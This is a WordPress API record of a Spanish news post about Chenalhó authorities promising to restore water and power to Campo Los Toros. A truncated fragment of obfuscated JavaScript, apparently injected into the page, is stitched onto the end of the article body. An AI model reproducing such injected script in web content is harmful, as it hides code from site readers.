{"id":7484,"date":"2022-12-21T04:06:20","date_gmt":"2022-12-21T04:06:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7484"},"modified":"2022-12-21T04:06:21","modified_gmt":"2022-12-21T04:06:21","slug":"se-comprometen-autoridades-de-chenalho-reconectar-luz-y-agua-en-campo-los-toros","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7484","title":{"rendered":"Se comprometen autoridades de Chenalh\u00f3, reconectar luz y agua en Campo Los Toros"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"7485\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20210712-WA0208.jpg\" alt=\"\" class=\"wp-image-7485\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20210712-WA0208.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20210712-WA0208-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20210712-WA0208-768x432.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/<\/p>\n\n\n\n<p>20 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- Integrantes de las Sociedad Civil Las Abejas de Acteal, informaron que despu\u00e9s de una reuni\u00f3n que sostuvieron con autoridades del municipio de Chenalh\u00f3, entre ellos el presidente Abraham Cruz G\u00f3mez, se comprometieron a reconectar el agua y la luz, a los pobladores de la comunidad Campo Los Toros a m\u00e1s tardar el pr\u00f3ximo 23 de diciembre del presente a\u00f1o.<\/p>\n\n\n\n<p>\u201cLes informamos la pl\u00e1tica con el presidente municipal de Chenalh\u00f3 y el agente y patronato de agua y luz el\u00e9ctrica de la comunidad Campo los Toros, realizado en la presidencia; dichas autoridades se comprometieron a reconectar el servicio de agua y luz el\u00e9ctrica este 23 de diciembre de 2022\u201d, citan en un escrito.<\/p>\n\n\n\n<p>De acuerdo a escritos enviados por miembros de Las Abejas de Acteal, el pasado 15 de diciembre les fue cortado el servicio de agua y energ\u00eda el\u00e9ctrica, y despu\u00e9s de varios d\u00edas fueron atendidos por las autoridades municipales.<\/p>\n\n\n\n<p>Algunas fuentes de la comunidad Campo Los Toros, indican que el corte de dichos servicios, se debi\u00f3 a que las familias no quisieron colaborar en las actividades comunales que se realizan para el cuidado del agua, por lo que en una asamblea, por mayor\u00eda determinaron las acciones, que nada tienen que ver con ser integrantes de Las Abejas de Acteal.<\/p>\n\n\n\n<p>Los integrantes de Las Abejas, pidieron estar atentos porque siguen pendientes de resolver los casos de corte de agua y luz a las familias de Las Abejas de Bach\u00b4en \u201casi como el caso de nuestro compa\u00f1ero Francisco de la colonia Puebla y del conflicto en la comunidad Nuevo Yibeljoj\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ 20 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- Integrantes de las Sociedad Civil Las Abejas de Acteal, informaron que despu\u00e9s de una reuni\u00f3n que sostuvieron con autoridades del municipio de Chenalh\u00f3, entre ellos el presidente Abraham Cruz G\u00f3mez, se comprometieron a reconectar el agua y la luz, a los pobladores de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7485,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7484","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7484"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7484\/revisions"}],"predecessor-version":[{"id":7486,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7484\/revisions\/7486"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7485"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}